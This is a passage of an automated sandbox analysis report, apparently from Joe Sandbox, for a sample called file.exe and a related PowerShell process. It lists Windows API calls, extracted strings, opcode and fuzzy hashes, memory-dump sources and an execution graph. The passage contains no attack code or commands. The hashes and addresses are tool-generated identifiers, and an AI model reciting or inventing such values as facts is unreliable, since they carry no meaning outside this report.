                                      • Opcode ID: c3abc48754519be15551293a6e0649ae656e409aee0bb9161411e3edb71b8ba7
                                      • Instruction ID: 96a6e67f4a3bba65fe8b86b62a441c6d014a72587dd4a9fd3d699795ebf9ee11
                                      • Instruction Fuzzy Hash: 7F517B62A18A5289E710CF65E5443ACBBB4BB44B98F088175DE4EE7B98DF38D545C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 262959230-0
                                      • Opcode ID: 5883cc27a293ff30a1e7e682c7b1825e7353ebae92c9f477f46e4879092f6a47
                                      • Instruction ID: cf3126deb62c01e4fc6f10b0c148e7ca2e5c26dc3984d02e3f79b070ebcfcf46
                                      • Instruction Fuzzy Hash: E0418E22A0AB4789EB549F61E5003B926D1FF44BA8F1C4674EA6DE6BD5DF3CE1818340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: 58013ddfa1b8f2a6b284722f37e6c4f9e5d0fe59be829cfb9bb44955ab89945c
                                      • Instruction ID: 7abc01f2f4b3bbdd9d298780f5c9540b37b240c7bb85f5d510cd72bfa05e2a87
                                      • Instruction Fuzzy Hash: B2410622B0AA4382FE159F26A9015756396BF44FE8F1D8576DD1EEB785EF3CE4408300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                      • Instruction ID: fe87f0687010391227d0c12977c58604e7247218e6380a90c86c61cbb487d2ba
                                      • Instruction Fuzzy Hash: 2011C636E5CA030DF6D41D28E7823B911416F553B8F5D56B4EA6EE75D6CE2CA4CC4201
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                      • String ID:
                                      • API String ID: 3621893840-0
                                      • Opcode ID: 778d1433a15cb232463e835737ecf941f1ea11e5feb15a2f4f0cdc38d0c17baa
                                      • Instruction ID: a13182549fa107cc6500b619b0267893a2604b211cf6a8828185d7d5da0ce160
                                      • Instruction Fuzzy Hash: 57F06221B3895A83F7508B24E495F762252FFE4709F685170E64FD19A4DF2CD149C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: __except_validate_context_recordabort
                                      • String ID: csm$csm
                                      • API String ID: 746414643-3733052814
                                      • Opcode ID: 45511b213c9a374d7ceaaf4858a5ad53e2acac7686b2eca8251f0658937cf8b7
                                      • Instruction ID: 38516c5a5dca9fa3694642deb10b004450b543147e815bb9b1527a269041d52c
                                      • Instruction Fuzzy Hash: A071A07250A6928ADB608F25905077DBBA0EF45F8DF0881B5EE8CE7A89DF3CD591C701
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: $*
                                      • API String ID: 3215553584-3982473090
                                      • Opcode ID: 9f157a4f6751954bae8bab9751d51363cef21cdc707d610504346d4c75dafc04
                                      • Instruction ID: df99bdd08582007be1b5e8c5a7f989a84d01ddd9e97b3cdfbd56649ee584dd92
                                      • Instruction Fuzzy Hash: 4A51507290E6478AE7648F34904937C7FA1EF15B8CF1C11B6C64AE2299CF28E481C745
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: ByteCharMultiWide$StringType
                                      • String ID: $%s
                                      • API String ID: 3586891840-3791308623
                                      • Opcode ID: e5e9050dfdaeb3c12b157b48f2e5ef5602bf6f551ba74a9a670d22b2743eb576
                                      • Instruction ID: 6c52d30572873097c0b82b899c7a8ac659df9da5f84ad45ff40660243497ca03
                                      • Instruction Fuzzy Hash: 76418F22B19B828AEBA08F65D9006A962D1FF45BACF4C0675DE1DE77D4DF3CE4458300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_recordabort
                                      • String ID: csm
                                      • API String ID: 2466640111-1018135373
                                      • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                      • Instruction ID: 7d49fc64d3279e3370d6ff272ff061e2ff4c06740ddbf974aad13cbcee38721a
                                      • Instruction Fuzzy Hash: E5517E7261A74286DA20EB25E44026E77E4FB88B94F580574EB8ED7B55DF3CE450CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: U
                                      • API String ID: 2456169464-4171548499
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID:
                                      • API String ID: 1429681911-3916222277
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(?,?,?,00007FF65A3730FF,?,?,00001000,00007FF65A35E52D), ref: 00007FF65A36E837
                                      • CreateSemaphoreW.KERNEL32(?,?,?,00007FF65A3730FF,?,?,00001000,00007FF65A35E52D), ref: 00007FF65A36E847
                                      • CreateEventW.KERNEL32(?,?,?,00007FF65A3730FF,?,?,00001000,00007FF65A35E52D), ref: 00007FF65A36E860
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CapsDeviceRelease
                                      • String ID:
                                      • API String ID: 127614599-3916222277
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                      • String ID:
                                      • API String ID: 1137671866-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                      • String ID:
                                      • API String ID: 1077098981-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 4141327611-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3823481717-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390B11
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390B73
                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390BAD
                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65A38C3DB), ref: 00007FF65A390BD7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                      • String ID:
                                      • API String ID: 1557788787-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLast$abort
                                      • String ID:
                                      • API String ID: 1447195878-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: DXGIDebug.dll
                                      • API String ID: 3668304517-540382549
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: e+000$gfff
                                      • API String ID: 3215553584-3030954782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                      • String ID: SIZE
                                      • API String ID: 449872665-3243624926
                                      • Opcode ID: b02be524ea474bea70d79719afa614d78c4d7e79a77e3514f285b95cd58c6b42
                                      • Instruction ID: 6f02f641c0f6139fb33bb0e714f1a5bc28b7dbee06a457f41996084eff8005db
                                      • Opcode Fuzzy Hash: b02be524ea474bea70d79719afa614d78c4d7e79a77e3514f285b95cd58c6b42
                                      • Instruction Fuzzy Hash: AD41C462A2868285EE10DF24E4413BD6361EF857A8F584271EB9DEB7D5FE3CD581C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                      • String ID: C:\Users\user\Desktop\file.exe
                                      • API String ID: 3307058713-1957095476
                                      • Opcode ID: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                      • Instruction ID: f5856fc8ed50322f9dc0c6895011f8a67a3aee5c5f103e156be6ba067f111b6a
                                      • Opcode Fuzzy Hash: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                      • Instruction Fuzzy Hash: BC418B32A09A578AEB54DF21E8401BD77A4EF85BD8B5C4075EA4DE7BA5DF3CE4428300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$Text$Dialog
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 2638039312-3402441367
                                      • Opcode ID: 11baffdef81b6ddaf834caa36bb86d39819508dd1e3f916a274287401f1775d7
                                      • Instruction ID: c42a9457a39df86ebe3e14a116bd763e871e295e5e9a5dab64fdda5107a2828f
                                      • Opcode Fuzzy Hash: 11baffdef81b6ddaf834caa36bb86d39819508dd1e3f916a274287401f1775d7
                                      • Instruction Fuzzy Hash: C641D622B1CA8682FA509B15E4842B927A1EF8DBC8F5C0275DE4DF7795EE3CE5418340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_snwprintf
                                      • String ID: $%s$@%s
                                      • API String ID: 2650857296-834177443
                                      • Opcode ID: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                      • Instruction ID: 61d782e92a8768dc13f71d5d427f402235efe861a35dae99332051d0f5a627f2
                                      • Opcode Fuzzy Hash: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                      • Instruction Fuzzy Hash: 7C31B472B19B4685EA50CF66E5406E967A0FF4578CF481072EE0DEBB55EE3CE505C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID: @
                                      • API String ID: 3000768030-2766056989
                                      • Opcode ID: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                      • Instruction ID: 0e1627c637bdd818e4d462f5d229016f7d457c114b01aae16a11996dcefaa877
                                      • Opcode Fuzzy Hash: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                      • Instruction Fuzzy Hash: 95218422A0DA9342EB618B2894901392651EF85B78F3C1375D67FE77D4CE3DE885C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65A381CBE), ref: 00007FF65A38403C
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65A381CBE), ref: 00007FF65A384082
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      • Opcode ID: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                      • Instruction ID: 9b1d42dfb2115f286722bf37e6351251cb979ada5efc6ea1281464c9303c1834
                                      • Opcode Fuzzy Hash: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                      • Instruction Fuzzy Hash: CE114F72609B8182EB208F15E54026ABBA5FF88B98F1C4271DF8D97B54DF3CD551CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9DF
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1211598281-2248577382
                                      • Opcode ID: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                      • Instruction ID: b7606e9113acd906c4c4aa1d8027bd6b67139216ef46373a610886afdf39844e
                                      • Opcode Fuzzy Hash: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                      • Instruction Fuzzy Hash: 9BE0BF71E1980696F640AB35DC465B83711BFA63B8F9C43B1D03EE16F5AF2CA949C341
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                      • Instruction ID: f350c87d82d4f7081b296ca1fcbb0508d656382703a4c20136e2c9faf6b0aa08
                                      • Opcode Fuzzy Hash: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                      • Instruction Fuzzy Hash: 4DD05E91F0960286FF194FB1A84933516605F58B49F4C50B9C80ED63A0EF2CE094C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:1
                                      execution_graph 8175 7ffd9ba1d4f9 8178 7ffd9ba1d549 8175->8178 8176 7ffd9ba1d552 8177 7ffd9ba1d67d CreateFileW 8179 7ffd9ba1d6de 8177->8179 8178->8176 8178->8177 8180 7ffd9ba145ea 8181 7ffd9ba5fc40 GetFileType 8180->8181 8183 7ffd9ba5fcc4 8181->8183

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1767704062.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: d1bcfe7135ce9708f2cad2d0a56797da16dd20283a5fb6ca2a8388fd9a557cd1
                                      • Instruction ID: 935bc3efb4a46afec8ec748b60cb25656564094a47baad863ff90c8a4a7662bb
                                      • Opcode Fuzzy Hash: d1bcfe7135ce9708f2cad2d0a56797da16dd20283a5fb6ca2a8388fd9a557cd1
                                      • Instruction Fuzzy Hash: 4671F771A0DA484FD758DF6C9856AB97BE0FF59320F0442BEE08DD72A2DB75A8018781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 143 7ffd9ba145da-7ffd9ba1d673 147 7ffd9ba1d67d-7ffd9ba1d6dc CreateFileW 143->147 148 7ffd9ba1d675-7ffd9ba1d67a 143->148 149 7ffd9ba1d6de 147->149 150 7ffd9ba1d6e4-7ffd9ba1d70c 147->150 148->147 149->150
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1767704062.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                                      • Instruction ID: 32ea187902ff70f3b2c0cfa09ed30a4dfc0960029bb43002f7b159801641fc20
                                      • Opcode Fuzzy Hash: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                                      • Instruction Fuzzy Hash: 6D318171A1CA1C9FDB58EF58D845AF977E0FB69321F10422EE04EE3251CB71A8118BC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 152 7ffd9ba145ea-7ffd9ba5fcc2 GetFileType 156 7ffd9ba5fcc4 152->156 157 7ffd9ba5fcca-7ffd9ba5fcef 152->157 156->157
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1767704062.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                                      • Instruction ID: 3d403e2d80afb2a647e3683a313d88d05cb066fdfbaccc41e6e93579fa977108
                                      • Opcode Fuzzy Hash: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                                      • Instruction Fuzzy Hash: 61219230A08A0C9FDB58EB98C449BFDB7E0FB55321F00422ED04AD3691DB71A816CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1768397138.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9bae0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f60f6b0f68eefd615e04fc8f4e33c20665c5cc63abba2eca55cdac251dce30e7
                                      • Instruction ID: 0b6ac00a7cc9edf59562ff79e4a6b4fdde6f6bb7c05ebff1d032b48f3d788cfc
                                      • Opcode Fuzzy Hash: f60f6b0f68eefd615e04fc8f4e33c20665c5cc63abba2eca55cdac251dce30e7
                                      • Instruction Fuzzy Hash: FC123421B0EBD90FE366977858755B47FE1EFA2210B0A01FBD489C71E3DA589D06C392
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1944338278.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
